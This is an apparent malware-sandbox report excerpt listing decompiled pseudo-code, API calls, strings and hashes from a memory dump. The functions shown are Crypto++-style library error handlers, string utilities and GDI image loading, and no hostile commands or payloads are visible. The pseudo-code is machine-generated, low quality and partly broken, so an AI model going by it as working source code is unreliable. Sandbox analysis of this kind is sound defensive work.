Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8FreeLastThrow
String ID:
API String ID: 3166510937-0
Opcode ID: 463419567345a553cc3b0fba1562d0d3fc00f9cd25de2d4cb0a68dea0459febe
Instruction ID: 2a599516875fb0e01444fb01b6ac253fc4f770521c108501c2bf9f865b3d8937
Opcode Fuzzy Hash: 463419567345a553cc3b0fba1562d0d3fc00f9cd25de2d4cb0a68dea0459febe
Instruction Fuzzy Hash: F7E09B3044010CABCB00B7B5FD0A9BD776CAB01361B506B61F92DF15A1DF2195044792

Uniqueness

Uniqueness Score: -1.00%

Function 00E4B97B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E4B982

Part of subcall function 00E4BBDB: __EH_prolog3.LIBCMT ref: 00E4BBE2

Part of subcall function 00D0BC90: _malloc.LIBCMT ref: 00D0BCAC

Strings

TruncatedDigestSize, xrefs: 00E4BA79
AuthenticatedDecryptionFilterFlags, xrefs: 00E4BA64
BlockPaddingScheme, xrefs: 00E4BA49

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3$_malloc
String ID: AuthenticatedDecryptionFilterFlags$BlockPaddingScheme$TruncatedDigestSize
API String ID: 1683881009-2369340326
Opcode ID: a6d78b0534cc9a1ff477418c0e8ec9d2c894774e70d9cfc28ff25bf1f1e9c1a9
Instruction ID: 40ccb074513ffc1a4accdb426c7e2c1bf8ef5fde8a4de7833cc5451de4a2f8eb
Opcode Fuzzy Hash: a6d78b0534cc9a1ff477418c0e8ec9d2c894774e70d9cfc28ff25bf1f1e9c1a9
Instruction Fuzzy Hash: AF312670600249BEDB04EFA8D856BEEBBE8AF44304F00549DB55ABB2C2DB70DA04D760

Uniqueness

Uniqueness Score: -1.00%

Function 00CA4588 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00CA4588(intOrPtr __ecx, void* __eflags) {
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr* _t63;
				void* _t64;

				_t50 = __ecx;
				0xe21503(0x98);
				 *((intOrPtr*)(_t64 - 0xa4)) = __ecx;
				_t60 =  *((intOrPtr*)(_t64 + 0xc));
				_t49 =  *((intOrPtr*)(_t64 + 0x10));
				_t30 = E00CA2F01(__eflags);
				 *(_t64 - 4) =  *(_t64 - 4) & 0x00000000;
				_t32 = E00CA2ED4(_t49, _t50, _t64 - 0xa0, _t30, "\', stored \'");
				 *(_t64 - 4) = 1;
				0xe2204e(0xf10c2c, _t64 - 0x58, "NameValuePairs: type mismatch for \'",  *((intOrPtr*)(_t64 + 8)));
				_t34 = E00CA2ED4(_t49, _t60, _t64 - 0x70, _t32, _t32);
				 *(_t64 - 4) = 2;
				_t36 = E00CA2ED4(_t49, _t60, _t64 - 0x28, _t34, "\', trying to retrieve \'");
				 *(_t64 - 4) = 3;
				0xe2204e(0xf10c2c);
				_t38 = E00CA2ED4(_t49, _t49, _t64 - 0x88, _t36, _t36);
				 *(_t64 - 4) = 4;
				_t40 = E00CA2ED4(_t49, _t49, _t64 - 0x40, _t38, 0xe92cd4);
				_t63 =  *((intOrPtr*)(_t64 - 0xa4));
				 *(_t64 - 4) = 5;
				E00CA4197(_t63);
				 *_t63 = 0xe92ca8;
				E00CA23D6(_t64 - 0x40, 1, 0);
				E00CA23D6(_t64 - 0x88, 1, 0);
				E00CA23D6(_t64 - 0x28, 1, 0);
				E00CA23D6(_t64 - 0x70, 1, 0);
				E00CA23D6(_t64 - 0xa0, 1, 0);
				E00CA23D6(_t64 - 0x58, 1, 0);
				 *_t63 = 0xe92ccc;
				 *((intOrPtr*)(_t63 + 0x28)) = _t60;
				 *((intOrPtr*)(_t63 + 0x2c)) = _t49;
				0xe214b2(1, _t40);
				return _t63;
			}

0x00ca4588
0x00ca4592
0x00ca4597
0x00ca45a0
0x00ca45a3
0x00ca45b0
0x00ca45b5
0x00ca45c6
0x00ca45d7
0x00ca45db
0x00ca45e6
0x00ca45f4
0x00ca45f9
0x00ca460a
0x00ca460e
0x00ca461c
0x00ca462a
0x00ca462f
0x00ca4637
0x00ca4642
0x00ca4646
0x00ca4652
0x00ca4658
0x00ca4667
0x00ca4673
0x00ca467f
0x00ca468e
0x00ca469a
0x00ca469f
0x00ca46a7
0x00ca46aa
0x00ca46ad
0x00ca46b2

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA4592

Part of subcall function 00CA2F01: __EH_prolog3.LIBCMT ref: 00CA2F08

Part of subcall function 00E2204E: type_info::_Name_base.LIBCMT ref: 00E22055

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

Part of subcall function 00CA23D6: _memmove.LIBCMT ref: 00CA23F6

Strings

', stored ', xrefs: 00CA45B9
', trying to retrieve ', xrefs: 00CA45EB
NameValuePairs: type mismatch for ', xrefs: 00CA45AA

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3$H_prolog3_Name_base_memmovetype_info::_
String ID: ', stored '$', trying to retrieve '$NameValuePairs: type mismatch for '
API String ID: 3773968386-3022120042
Opcode ID: a3b1d58be8a9e8067edfc4fc38da3fe3ce504b24d6b75b5613df78cd80102883
Instruction ID: 0cacccaf08f4e19a420410da3663776f748ae4d4167dcf557b5c224f738767cb
Opcode Fuzzy Hash: a3b1d58be8a9e8067edfc4fc38da3fe3ce504b24d6b75b5613df78cd80102883
Instruction Fuzzy Hash: B2317271A40329BADF20EBA4CC42FDEB6A8AF16704F54444DF605B72C2DAF45AC4DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E4BE61 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E4BE68

Part of subcall function 00E4BBDB: __EH_prolog3.LIBCMT ref: 00E4BBE2

__CxxThrowException@8.LIBCMT ref: 00E4BF0D

Strings

StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher, xrefs: 00E4BEDE
BlockPaddingScheme, xrefs: 00E4BF1B

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Exception@8H_prolog3H_prolog3_Throw
String ID: BlockPaddingScheme$StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher
API String ID: 3648411918-3582606076
Opcode ID: fe795391cad7ee792b2ed157ad3d77c11fd19fed78ecf11e09aad4353b51da30
Instruction ID: f68276f1ccab0ba854ca12600502cde92902e09b76375992352a873640f7b159
Opcode Fuzzy Hash: fe795391cad7ee792b2ed157ad3d77c11fd19fed78ecf11e09aad4353b51da30
Instruction Fuzzy Hash: FD2171B0A00359AFDB00EF94C946B9DBBE8BF58304F445459E509B7382DBB4EA04DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7305 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CA736D
std::_Xinvalid_argument.LIBCPMT ref: 00CA73A5

Strings

invalid string position, xrefs: 00CA7396
string too long, xrefs: 00CA73A0

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: invalid string position$string too long
API String ID: 256744135-4289949731
Opcode ID: e60acf62627d77b0b8ac9786ef72a26e84637bd3d2e9979cd0d5c56abe55601a
Instruction ID: 22ccd21540e06a22c2dfb7b83a67bd251b070af12100dce81b3cf0d0b46d2331
Opcode Fuzzy Hash: e60acf62627d77b0b8ac9786ef72a26e84637bd3d2e9979cd0d5c56abe55601a
Instruction Fuzzy Hash: AD11B131306306AFDF248F6DDC84A2AB7A9FB42768B140A2DF826D7291C770ED44D794

Uniqueness

Uniqueness Score: -1.00%

Function 00E4D8B2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E4D8B9

Part of subcall function 00CA40CA: __EH_prolog3.LIBCMT ref: 00CA40D1

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00E4D91A

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

InputBuffer, xrefs: 00E4D8DA
StringStore: missing InputBuffer argument, xrefs: 00E4D8EB

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3$ExceptionException@8H_prolog3_RaiseThrow
String ID: InputBuffer$StringStore: missing InputBuffer argument
API String ID: 1185993512-2380213735
Opcode ID: c185453a3e80fb776cbdcbe799c107f0d85028ee2c6ccbdee4611272a9299160
Instruction ID: 91a1dc87b4566619cf18f31d77a6fe940d25f52fc09560429e77bb459732bb0e
Opcode Fuzzy Hash: c185453a3e80fb776cbdcbe799c107f0d85028ee2c6ccbdee4611272a9299160
Instruction Fuzzy Hash: C0118C70A00308AFCF04EFA4D896ADDBBF5AF55314F105159E509BB282CBB0AA45DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E49B4B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E49B55
__CxxThrowException@8.LIBCMT ref: 00E49BB4

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

Strings

Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 00E49BC3
Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 00E49B85

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Exception@8H_prolog3H_prolog3_Throw
String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
API String ID: 3648411918-3345525433
Opcode ID: 0151beedc6d1bf1d28395a336f8486c2784420539012708b8f16b2336606332e
Instruction ID: 532c32baee91f81a85dcbd39d41a0d4820655e655fdd1a6acec42c57d13146af
Opcode Fuzzy Hash: 0151beedc6d1bf1d28395a336f8486c2784420539012708b8f16b2336606332e
Instruction Fuzzy Hash: 27116131940318A9DF14EBA0D842BED77A5EF10718F443495EA04B7193DBB05A89CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6167 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00CA6167(void* __ecx) {
				void* _t13;
				void* _t23;

				0xe21503(0x44);
				_t13 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t23 + 8)))) + 4))("OutputStringPointer", 0xf04050, __ecx + 0xc);
				if(_t13 == 0) {
					E00CA1E2C(_t23 - 0x28, "StringSink: OutputStringPointer not specified");
					 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
					E00CA4197(_t23 - 0x50);
					_t13 = _t23 - 0x50;
					 *((intOrPtr*)(_t23 - 0x50)) = 0xe92ca8;
					0xe2143b(_t13, 0xee8078, 1, _t23 - 0x28);
				}
				0xe214b2();
				return _t13;
			}

0x00ca616e
0x00ca6188
0x00ca618d
0x00ca6197
0x00ca619c
0x00ca61a9
0x00ca61b3
0x00ca61b6
0x00ca61be
0x00ca61be
0x00ca61c3
0x00ca61c8

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA616E

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00CA61BE

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

OutputStringPointer, xrefs: 00CA617F
StringSink: OutputStringPointer not specified, xrefs: 00CA618F

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
API String ID: 1139647276-1331214609
Opcode ID: ce33c4a528747f8488b244ac135831f568b7f089a3d1f428014a8e963a5912d3
Instruction ID: 254c37bf94fb05a46e770410d7b9856bd70145c5c01700d7dcd7ac72386e1b34
Opcode Fuzzy Hash: ce33c4a528747f8488b244ac135831f568b7f089a3d1f428014a8e963a5912d3
Instruction Fuzzy Hash: 97F05E70A40218ABDF00EBA0C806FDDB778AF64705F445058E619BB181CBB1AB49C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00D38587 Relevance: 6.2, APIs: 4, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00D38587(intOrPtr __ecx, signed short __edx, intOrPtr _a8) {
				void* _v0;
				signed int _v4;
				void* _v8;
				signed int _v12;
				void* _v16;
				WCHAR* _v20;
				struct HINSTANCE__* _v24;
				intOrPtr _v28;
				int _v32;
				char _v36;
				int _v40;
				int _v44;
				signed short _v50;
				void _v68;
				intOrPtr _v72;
				short _v74;
				signed int _v84;
				signed int _v88;
				void _v96;
				intOrPtr _t109;
				signed int _t120;
				void* _t124;
				intOrPtr* _t135;
				signed int _t154;
				intOrPtr _t156;
				intOrPtr _t159;
				intOrPtr* _t164;
				intOrPtr _t168;
				signed int _t169;
				signed short _t173;
				signed short _t179;
				void* _t183;
				intOrPtr* _t185;
				signed char* _t186;
				void* _t190;
				intOrPtr* _t191;
				intOrPtr* _t192;
				signed int _t194;
				int _t196;
				signed int _t203;
				long long _t214;

				_t179 = __edx;
				_t109 = 0xe80007;
				0xe214d0(0x38);
				_t156 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x28)) != 0) {
					L14:
					0xe2149e();
					return _t109;
				} else {
					_t214 =  *((long long*)(__ecx + 0xb4));
					asm("fld1");
					asm("fucom st1");
					asm("fnstsw ax");
					st1 = _t214;
					if(4 != 0) {
						st0 = _t214;
					} else {
						_t154 =  *(__ecx + 0xac);
						 *((intOrPtr*)(__ecx + 8)) = 0;
						 *((long long*)(__ecx + 0xb4)) = _t214;
						if(_t154 != 0xffffffff) {
							 *(__ecx + 0xac) =  *(__ecx + 0xac) | 0xffffffff;
							 *(__ecx + 0xa8) = _t154;
						}
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						asm("movsd");
						 *((intOrPtr*)(_t156 + 0x54)) =  *((intOrPtr*)(_t156 + 0x5c));
						_t109 =  *((intOrPtr*)(_t156 + 0x60));
						asm("movsd");
						 *((intOrPtr*)(_t156 + 0x58)) = _t109;
						 *((intOrPtr*)(_t156 + 0x5c)) = 0;
						 *((intOrPtr*)(_t156 + 0x60)) = 0;
						asm("movsd");
						 *((intOrPtr*)(_t156 + 0x64)) = 0;
						 *((intOrPtr*)(_t156 + 0x68)) = 0;
						asm("movsd");
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t190 = _t156 + 0x8c;
					if( *_t190 == 0) {
						L9:
						E00D395F6(_t156);
						if( *0xf0d78c != 0) {
							_push( *((intOrPtr*)(_t156 + 0x54)));
							_push(_t190);
							E00D38061();
						}
						_t191 = _t156 + 0x90;
						E00D10DEA(_t191);
						 *_t191 = 0;
						_t192 = _t156 + 0x94;
						E00D10DEA(_t192);
						 *_t192 = 0;
						if( *((intOrPtr*)(_t156 + 0x30)) != 0) {
							E00D3705D(_t156, _t179, _t214,  *((intOrPtr*)(_t156 + 0xc)));
						}
						_t109 =  *((intOrPtr*)(E00D20FF2() + 0x20));
						 *((intOrPtr*)(_t156 + 0xb0)) = _t109;
						goto L14;
					} else {
						if( *((intOrPtr*)(_t156 + 0x18)) == 0) {
							if( *((intOrPtr*)(_t156 + 0xc8)) == 0) {
								goto L14;
							} else {
								E00D10DEA(_t190);
								_t185 =  *((intOrPtr*)(_t156 + 0xc0));
								_t164 =  *((intOrPtr*)(_t156 + 0xdc));
								if(_t185 == 0) {
									goto L9;
								} else {
									while((0 | _t164 != 0x00000000) != 0) {
										_t179 =  *(_t185 + 8);
										_t185 =  *_t185;
										asm("sbb eax, eax");
										if(0 == _t179) {
											break;
										} else {
											_v32 = _v32 & 0x00000000;
											_v28 =  *_t164;
											_v24 =  *((intOrPtr*)(_t164 + 8));
											_v36 = 0xea53b8;
											_v4 = _v4 & 0x00000000;
											_v20 = _t179 & 0x0000ffff;
											if(E00D37919( &_v36, _t179, _t214, _t179 & 0x0000ffff,  *((intOrPtr*)(_t164 + 8))) == 0) {
												L21:
												_t196 = 0x2000;
												if( *((intOrPtr*)(_t156 + 0x34)) != 0 && E00D375DC(E00D20FF2()) == 0) {
													_t196 = 0x3000;
												}
												_t190 = LoadImageW(_v24, _v20, 0, 0, 0, _t196);
												_v16 = _t190;
											} else {
												_t190 = E00D1AA2D(_t156,  &_v36, _t179);
												_v16 = _t190;
												if(_t190 == 0) {
													goto L21;
												}
											}
											GetObjectW(_t190, 0x18,  &_v68);
											_t173 = _v50;
											 *(_t156 + 8) = _t173 & 0x0000ffff;
											if(_t173 < 0x20) {
												if(_t173 <= 8 ||  *((intOrPtr*)(_t156 + 0x34)) == 0) {
													if( *((intOrPtr*)(E00D20FF2() + 0x184)) != 0) {
														goto L30;
													}
												} else {
													L30:
													E00D37C66(_t156, _t179, _t214,  &_v16, 0, 0xffffffff, 0xffffffff);
													_t190 = _v16;
												}
											} else {
												_push( *((intOrPtr*)(_t156 + 0x3c)));
												_push(_t190);
												L34();
											}
											_push(0);
											_push(_t190);
											L00D34CAC(_t156, _t214);
											DeleteObject(_t190);
											_v4 = _v4 | 0xffffffff;
											_v36 = 0xea00f4;
											E00D1A062( &_v36);
											_t164 = _v28;
											if(_t185 != 0) {
												continue;
											} else {
												_t190 = _t156 + 0x8c;
												goto L9;
											}
										}
										goto L52;
									}
									E00D0BD09(_t164);
									asm("int3");
									_t120 =  *0xf02790; // 0x8cab593a
									_v12 = _t120 ^ _t203;
									if(GetObjectW(_v0, 0x54,  &_v96) != 0) {
										if(_v74 != 0x20) {
											goto L35;
										} else {
											_t168 = _v72;
											if(_t168 == 0) {
												goto L35;
											} else {
												_push(_t156);
												_push(_t190);
												_t194 = _v84 * _v88;
												if(_a8 == 0) {
													L46:
													if(_t194 > 0) {
														_push(_t185);
														_t89 = _t168 + 1; // 0x11
														_t186 = _t89;
														do {
															_t169 = _t186[2] & 0x000000ff;
															asm("cdq");
															_t186[1] = (_t186[1] & 0x000000ff) * _t169 / 0xff;
															asm("cdq");
															 *_t186 = ( *_t186 & 0x000000ff) * _t169 / 0xff;
															_t186 =  &(_t186[4]);
															asm("cdq");
															 *(_t186 - 5) = ( *(_t186 - 5) & 0x000000ff) * _t169 / 0xff;
															_t194 = _t194 - 1;
														} while (_t194 != 0);
													}
												} else {
													_t183 = 0;
													if(_t194 > 0) {
														_t85 = _t168 + 3; // 0x13
														_t135 = _t85;
														while(1) {
															_t159 =  *_t135;
															if( *((intOrPtr*)(_t135 - 1)) > _t159 ||  *((intOrPtr*)(_t135 - 2)) > _t159 ||  *((intOrPtr*)(_t135 - 3)) > _t159) {
																goto L46;
															}
															_t135 = _t135 + 4;
															_t183 = _t183 + 1;
															if(_t183 < _t194) {
																continue;
															} else {
															}
															goto L50;
														}
														goto L46;
													}
												}
												L50:
												_t124 = 1;
											}
										}
									} else {
										L35:
										_t124 = 0;
									}
									0xe2142c();
									return _t124;
								}
							}
						} else {
							E00D3768E(_t156, _t179, _t214,  *((intOrPtr*)(_t156 + 0x98)), 0);
							goto L9;
						}
					}
				}
				L52:
			}

0x00d38587
0x00d38589
0x00d3858e
0x00d38593
0x00d3859a
0x00d3868d
0x00d3868d
0x00d38692
0x00d385a0
0x00d385a0
0x00d385a6
0x00d385a8
0x00d385aa
0x00d385ac
0x00d385b1
0x00d3861a
0x00d385b3
0x00d385b3
0x00d385b9
0x00d385bc
0x00d385c5
0x00d385c7
0x00d385ce
0x00d385ce
0x00d385d4
0x00d385da
0x00d385e0
0x00d385e3
0x00d385e6
0x00d385ea
0x00d385ed
0x00d385f0
0x00d385f1
0x00d385f4
0x00d385f7
0x00d385fa
0x00d385fb
0x00d385fe
0x00d38601
0x00d38602
0x00d38608
0x00d3860e
0x00d38611
0x00d38614
0x00d38615
0x00d38616
0x00d38617
0x00d38617
0x00d3861c
0x00d38624
0x00d38639
0x00d3863b
0x00d38647
0x00d38649
0x00d3864c
0x00d3864d
0x00d3864d
0x00d38652
0x00d38659
0x00d38660
0x00d38662
0x00d38669
0x00d3866e
0x00d38673
0x00d3867a
0x00d3867a
0x00d38684
0x00d38687
0x00000000
0x00d38626
0x00d38629
0x00d38699
0x00000000
0x00d3869b
0x00d3869c
0x00d386a1
0x00d386a7
0x00d386af
0x00000000
0x00d386b1
0x00d386b1
0x00d386c0
0x00d386c5
0x00d386c9
0x00d386cd
0x00000000
0x00d386d3
0x00d386d8
0x00d386dc
0x00d386df
0x00d386e2
0x00d386e9
0x00d386f1
0x00d386ff
0x00d38712
0x00d38716
0x00d3871b
0x00d3872d
0x00d3872d
0x00d38744
0x00d38746
0x00d38701
0x00d38709
0x00d3870b
0x00d38710
0x00000000
0x00000000
0x00d38710
0x00d38750
0x00d38756
0x00d3875d
0x00d38764
0x00d38775
0x00d38789
0x00000000
0x00000000
0x00d3878b
0x00d3878b
0x00d38795
0x00d3879a
0x00d3879a
0x00d38766
0x00d38766
0x00d38769
0x00d3876a
0x00d3876a
0x00d3879d
0x00d3879f
0x00d387a2
0x00d387a8
0x00d387ae
0x00d387b5
0x00d387bc
0x00d387c1
0x00d387c6
0x00000000
0x00d387cc
0x00d387cc
0x00000000
0x00d387cc
0x00d387c6
0x00000000
0x00d386cd
0x00d387d7
0x00d387dc
0x00d387e3
0x00d387ea
0x00d387ff
0x00d3880d
0x00000000
0x00d3880f
0x00d3880f
0x00d38814
0x00000000
0x00d38816
0x00d38816
0x00d38817
0x00d3881b
0x00d38823
0x00d38849
0x00d3884b
0x00d3884d
0x00d3884e
0x00d3884e
0x00d38856
0x00d38856
0x00d38861
0x00d38864
0x00d3886d
0x00d38870
0x00d38872
0x00d3887c
0x00d3887f
0x00d38882
0x00d38882
0x00d38885
0x00d38825
0x00d38825
0x00d38829
0x00d3882b
0x00d3882b
0x00d3882e
0x00d3882e
0x00d38833
0x00000000
0x00000000
0x00d3883f
0x00d38842
0x00d38845
0x00000000
0x00000000
0x00d38847
0x00000000
0x00d38845
0x00000000
0x00d3882e
0x00d38829
0x00d38886
0x00d38889
0x00d3888a
0x00d38814
0x00d38801
0x00d38801
0x00d38801
0x00d38801
0x00d38890
0x00d38898
0x00d38898
0x00d386af
0x00d3862b
0x00d38634
0x00000000
0x00d38634
0x00d38629
0x00d38624
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 00D3858E
LoadImageW.USER32(?,00000000,00000000,00000000,00000000,00002000), ref: 00D3873E
GetObjectW.GDI32(00000000,00000018,?), ref: 00D38750
DeleteObject.GDI32(00000000), ref: 00D387A8

Memory Dump Source

